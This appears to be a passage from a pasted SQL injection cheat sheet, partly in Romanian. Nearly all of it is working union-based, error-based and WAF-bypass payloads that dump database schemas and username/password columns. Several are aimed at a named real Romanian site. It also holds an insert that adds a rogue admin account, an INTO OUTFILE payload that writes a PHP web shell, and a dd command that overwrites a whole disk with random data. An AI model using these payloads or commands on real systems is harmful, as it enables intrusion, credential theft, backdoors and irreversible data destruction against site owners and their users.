  632. concat(0x7e,0×27,cast(schema_name as char),0×27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
  633. information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  634.  
  635. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  636. concat(0x7e,0×27,cast(table_name as char),0×27,0x7e) FROM information_schema.tables Where
  637. table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  638. information_schema.tables group by x)a) and 1
  639. ===================================================================================================================================
  640. WUBI +and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+
  641. ===================================================================================================================================
  642.  
  643. Descarci orice linux live, bootezi dupa el si formatezi cu dd+urandom. De acolo nu mai recupereaza NIMENI ceva.
  644. Code: dd if=/dev/urandom of=/dev/sda bs=1M
  645.  
  646. I’d say using concat(0xY)
  647.  
  648. Y being ‘’ in hex
  649. union select concat(version,0x3c7363726970743e616c6572742827706833776c27293c2f7363726970743e)
  650.  
  651. http://zerocoolhf.altervista.org/level2.php…–+
  652.  
  653. union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=concat(’0x’, hex(‘users’)
  654.  
  655. =113′+and+0+union+select+1,(SELECT (@) FROM (SELECT(@:=0×00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x3C7363726970743E616C6572742827,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name,0x27293B3C2F7363726970743E))))x),3–+–
  656.  
  657. injection in sql database addd new user
  658. INSERT INTO admins (`name`,`password`,`email`) VALUES (‘unix’,'unixunix’,'unix_chro@yahoo.com’)
  659.  
  660. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  661.  
  662. CHALLENGES
  663.  
  664. Code:
  665. =(13)and(0)union(select(1),group_concat(column_name,0x3c62723e),(3)from(information_schema.columns)where(table_schema=database())and(table_name=0×7365637572697479))–+-
  666. =12+and+false/*!union*/ /*!select*/1,group_concat(0x3c62723e,/*!TabLe_NaMe*/),2,concat(user(),0x2a,database(),0x2a,version()),13,0x3c666f6e7420636f6c6f723d626c75653e3c68323e706833776c,15 from information_schema.tables where table_schema=0x66616272697a696f5f636572697070 LiMit 0,1–
  667. =/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version(),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!fRoM*/ security–
  668. =121)+and(0)+/*!uNion*/+/*!seleCt*/+1,2,3,4,version(),6,7– -
  669. =121)/**/and false UNION(SELECT 1,2,3,4,5,6,7)–+-
  670. =121 div 0 ) /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,version()# |
  671. null’+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata– x
  672. ===================================================================================================================================
  673. Error Based:
  674. ===================================================================================================================================
  675. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–
  676.  
  677. or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150)
  678.  
  679. from rmdsz_user),floor(rand(0)*2)) having min(0) or 1– -
  680. or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 — -
  681.  
  682. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  683.  
  684. +AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))
  685.  
  686. +and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_ schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)– x
  687.  
  688. or 1=convert(int,(@@version))-
  689. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–
  690. +and+(select+1+from+(select+count(*),concat((select(select+concat(c ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0, 1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  691.  
  692. (42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75653e706833776c,7,8,9,(10))–+-
  693. ===================================================================================================================================
  694. WAF BYPASS BY TOTTI
  695. ===================================================================================================================================
  696.  
  697. =-2/*1337*/UNION/*1337*/(SELECT/*1337*/1337,concat_ws(0x203a20,0x746f7474693933,table_nam e)/*1337*/FROM/*1337*/INFORMATION_SCHEMA./*!TABLES*//*1337*/WHERE/*1337*/TABLE_SCHEMA=database())– -
  698.  
  699. =2+and(0)+union+distinctROW+select+1,/*!50000CoNcaT*/(0x706833776c,0x3a,table_name) /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()– -
  700.  
  701. ===================================================================================================================================
  702. WUBI – 1,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0×69)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2020203d3e3e202020,table_name,0x20203a3a3a32020,column_name))))x),3,4–
  703.  
  704. (select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
  705. (select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  706.  
  707. (select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  708. ===================================================================================================================================
  709.  
  710. +and+1=convert(int,SERVERPROPERTY(‘ProductVersion’))
  711. ===================================================================================================================================
  712.  
  713. http://zerofreak.blogspot.it/…/tutorial-by-zer0freak-zer0fr…
  714.  
  715. http://www.websec.ca/kb/sql_injection
  716.  
  717. http://www.hellboundhackers.org/…/862-mysql-injection-compl…
  718.  
  719. ===================================================================================================================================
  720. test
  721.  
  722. http://www.mt.ro/nou/articol.php?id=-angajari’+and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+
  723.  
  724. …………………………………..
  725. http://www.mt.ro/nou/articol.php?id=-angajari’ and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x64625f6d74 limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+
  726.  
  727. SELECT “ system($_REQUEST['cmd']); ?>”
  728. INTO OUTFILE “full/path/here/cmd.php”
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement